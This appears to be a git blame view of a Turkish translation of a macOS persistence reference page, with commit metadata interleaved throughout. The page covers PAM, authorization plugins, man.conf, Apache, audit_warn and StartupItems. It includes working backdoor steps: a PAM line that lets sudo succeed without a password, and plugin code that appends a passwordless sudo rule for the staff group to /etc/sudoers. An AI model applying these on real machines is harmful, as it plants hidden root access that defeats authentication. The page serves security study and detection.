											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Her zaman kök gereklidir
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								PAM, macOS içinde kolay yürütmeden ziyade **kalıcılık** ve kötü amaçlı yazılımlara daha fazla odaklandığı için, bu blog detaylı bir açıklama sunmayacak, **bu teknik hakkında daha iyi anlamak için yazıları okuyun**.
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								PAM modüllerini kontrol etmek için:
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								```bash
 								ls -l /etc/pam.d
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bir süreklilik/privilege escalation tekniği PAM'ı kötüye kullanarak /etc/pam.d/sudo modülünü değiştirerek kolayca yapılabilir. Başlangıca şu satırı eklemek yeterlidir:
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								```bash
 								auth       sufficient     pam_permit.so
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yani bu şöyle **görünecek**:
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								```bash
 								# sudo: auth account password session
 								auth       sufficient     pam_permit.so
 								auth       include        sudo_local
 								auth       sufficient     pam_smartcard.so
 								auth       required       pam_opendirectory.so
 								account    required       pam_permit.so
 								password   required       pam_deny.so
 								session    required       pam_permit.so
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ve dolayısıyla **`sudo` kullanma girişimi başarılı olacaktır**.
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
 								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu dizin TCC tarafından korunduğundan, kullanıcının erişim isteyen bir uyarı alması oldukça olasıdır.
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Yetkilendirme Eklentileri
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
 								Açıklama: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak root olmanız ve ek yapılandırmalar yapmanız gerekmektedir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: ???
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* `/Library/Security/SecurityAgentPlugins/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Root gereklidir
 								* Eklentiyi kullanmak için yetkilendirme veritabanını yapılandırmak da gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Kullanıcı oturum açtığında kalıcılığı sürdürmek için yürütülecek bir yetkilendirme eklentisi oluşturabilirsiniz. Bu eklentilerden birini nasıl oluşturacağınız hakkında daha fazla bilgi için önceki açıklamalara bakın (ve dikkat edin, kötü yazılmış bir eklenti sizi dışarıda bırakabilir ve Mac'inizi kurtarma modundan temizlemeniz gerekebilir).
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								```objectivec
 								// Compile the code and create a real bundle
 								// gcc -bundle -framework Foundation main.m -o CustomAuth
 								// mkdir -p CustomAuth.bundle/Contents/MacOS
 								// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
 								#import <Foundation/Foundation.h>
 								__attribute__((constructor)) static void run()
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
 								system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								}
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**Birleşimi** yüklenmesi gereken konuma taşıyın:
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								```bash
 								cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Son olarak, bu Eklentiyi yüklemek için **kuralı** ekleyin:
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								```bash
 								cat > /tmp/rule.plist <<EOF
 								<?xml version="1.0" encoding="UTF-8"?>
 								<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 								<plist version="1.0">
 								<dict>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<key>class</key>
 								<string>evaluate-mechanisms</string>
 								<key>mechanisms</key>
 								<array>
 								<string>CustomAuth:login,privileged</string>
 								</array>
 								</dict>
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								</plist>
 								EOF
 								security authorizationdb write com.asdf.asdf < /tmp/rule.plist
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**`evaluate-mechanisms`** yetkilendirme çerçevesine dış bir mekanizmayı çağırması gerekeceğini belirtecektir. Ayrıca, **`privileged`** root tarafından yürütülmesini sağlayacaktır.
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Şununla tetikleyin:
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
+								```bash
 								security authorize com.asdf.asdf
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ve sonra **personel grubunun sudo erişimi olmalıdır** (`/etc/sudoers` dosyasını okuyun doğrulamak için).
-												GITBOOK-4148: change request with no subject merged in GitBook

											
										
										
											2023-11-03 11:03:53 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### Man.conf
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Ancak root olmanız ve kullanıcının man kullanması gerekmektedir
 								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/private/etc/man.conf`**
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Root gerekli
 								* **`/private/etc/man.conf`**: Her man kullanıldığında
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yapılandırma dosyası **`/private/etc/man.conf`**, man belgelendirme dosyalarını açarken kullanılacak ikili betiği gösterir. Bu nedenle yürütülecek bir arka kapı belirlenebilir, böylece kullanıcı herhangi bir belgeyi okumak için man kullandığında bir arka kapı yürütülür.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Örneğin **`/private/etc/man.conf`** içinde ayarlanmış:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```
 								MANPAGER /tmp/view
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Ve ardından `/tmp/view`'i şu şekilde oluşturun:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								#!/bin/zsh
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								touch /tmp/manconf
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/usr/bin/less -s
 								```
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								### Apache2
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kum havuzunu atlamak için faydalı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Ancak root olmanız ve apache'nin çalışıyor olması gerekmektedir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Httpd'nin yetkilendirmeleri yok
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* **`/etc/apache2/httpd.conf`**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Root gerekli
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Tetikleyici: Apache2 başlatıldığında
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								#### Açıklama ve Sızma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								`/etc/apache2/httpd.conf` dosyasında bir modülü yüklemek için aşağıdaki gibi bir satır ekleyebilirsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code overflow="wrap" %}
 								```bash
 								LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
 								```
 								{% endcode %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu şekilde derlenmiş modülleriniz Apache tarafından yüklenecektir. Tek yapmanız gereken ya **geçerli bir Apple sertifikası ile imzalamak** ya da sisteme **yeni güvenilir bir sertifika eklemek** ve onunla **imzalamak**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ardından, gerektiğinde sunucunun başlatılacağından emin olmak için şunu çalıştırabilirsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
 								sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Dylb için kod örneği:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```objectivec
 								#include <stdio.h>
 								#include <syslog.h>
 								__attribute__((constructor))
 								static void myconstructor(int argc, const char **argv)
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								printf("[+] dylib constructor called from %s\n", argv[0]);
 								syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### BSM denetim çerçevesi
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için faydalı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Ancak root olmanız, auditd'nin çalışıyor olması ve bir uyarıya neden olmanız gerekmektedir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* **`/etc/security/audit_warn`**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Root gerekli
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Auditd bir uyarı algıladığında
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								#### Açıklama ve Sızma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Auditd bir uyarı algıladığında **`/etc/security/audit_warn`** betiği **çalıştırılır**. Bu nedenle kendi yükünüzü ekleyebilirsiniz.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
 								echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Başlangıç Öğeleri
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4097: change request with no subject merged in GitBook

											
										
										
											2023-09-26 23:39:35 +00:00
+								{% hint style="danger" %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								**Bu kullanım dışıdır, bu yüzden bu dizinlerde hiçbir şey bulunmamalıdır.**
-												GITBOOK-4097: change request with no subject merged in GitBook

											
										
										
											2023-09-26 23:39:35 +00:00
+								{% endhint %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**StartupItem**, ya `/Library/StartupItems/` ya da `/System/Library/StartupItems/` içinde bulunması gereken bir dizindir. Bu dizin oluşturulduğunda, içermesi gereken iki belirli dosya bulunmalıdır:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. Bir **rc betiği**: Başlangıçta çalıştırılan bir kabuk betiği.
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+. **plist dosyası**, özellikle `StartupParameters.plist` adında, çeşitli yapılandırma ayarlarını içeren.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Başlangıç işlemi tarafından bunları tanıması ve kullanması için hem rc betiğinin hem de `StartupParameters.plist` dosyasının doğru şekilde **StartupItem** dizini içine yerleştirildiğinden emin olun.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								{% tabs %}
 								{% tab title="StartupParameters.plist" %}
 								```xml
 								<?xml version="1.0" encoding="UTF-8"?>
 								<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 								<plist version="1.0">
 								<dict>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<key>Description</key>
 								<string>This is a description of this service</string>
 								<key>OrderPreference</key>
 								<string>None</string> <!--Other req services to execute before this -->
 								<key>Provides</key>
 								<array>
 								<string>superservicename</string> <!--Name of the services provided by this file -->
 								</array>
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								</dict>
 								</plist>
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								{% endtab %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								{% tab title="superservisadı" %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
 								#!/bin/sh
 								. /etc/rc.common
 								StartService(){
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								touch /tmp/superservicestarted
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								StopService(){
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								rm /tmp/superservicestarted
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								RestartService(){
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								echo "Restarting"
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								RunService "$1"
 								```
 								{% endtab %}
 								{% endtabs %}
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### ~~emond~~
 								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu bileşeni macOS'ta bulamıyorum, daha fazla bilgi için writeup'a bakın
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Apple tarafından tanıtılan **emond**, geliştirilmemiş veya muhtemelen terkedilmiş gibi görünen bir günlükleme mekanizmasıdır, ancak hala erişilebilir durumda. Mac yöneticileri için özellikle faydalı olmasa da, bu belirsiz hizmet, tehdit aktörleri için hafif bir kalıcılık yöntemi olarak hizmet edebilir ve muhtemelen çoğu macOS yöneticisi tarafından fark edilmeyebilir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Varlığından haberdar olanlar için, **emond**'un kötüye kullanımını tespit etmek kolaydır. Bu hizmetin sistem için LaunchDaemon'ı, yürütülecek betikleri tek bir dizinde arar. Bunun incelenmesi için aşağıdaki komut kullanılabilir:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								ls -l /private/var/db/emondClients
 								```
 								### ~~XQuartz~~
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Yazım: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Root gereklidir
 								* **Tetikleyici**: XQuartz ile
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								#### Açıklama ve Sızma
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								XQuartz artık macOS'ta **kurulu değil**, bu yüzden daha fazla bilgi için yazıya bakın.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								### ~~kext~~
 								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Kext'i yüklemek bile kök olarak çok karmaşıktır, bu nedenle bunu kum havuzlarından kaçmak veya kalıcılık için düşünmeyeceğim (sadece bir açığız varsa)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bir KEXT'i başlangıç öğesi olarak yüklemek için aşağıdaki konumlardan birine **yüklü olması gerekir**:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* `/System/Library/Extensions`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* OS X işletim sistemi tarafından derlenmiş KEXT dosyaları.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* `/Library/Extensions`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* 3. taraf yazılım tarafından yüklenen KEXT dosyaları
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Şu anda yüklenmiş kext dosyalarını listeleyebilirsiniz:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								kextstat #List loaded kext
 								kextload /path/to/kext.kext #Load a new one based on path
 								kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
 								kextunload /path/to/kext.kext
 								kextunload -b com.apple.driver.ExampleBundle
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Daha fazla bilgi için [**çekirdek uzantılarına bu bölüme bakın**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers).
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								### ~~amstoold~~
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* **`/usr/local/bin/amstoold`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Root gereklidir
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

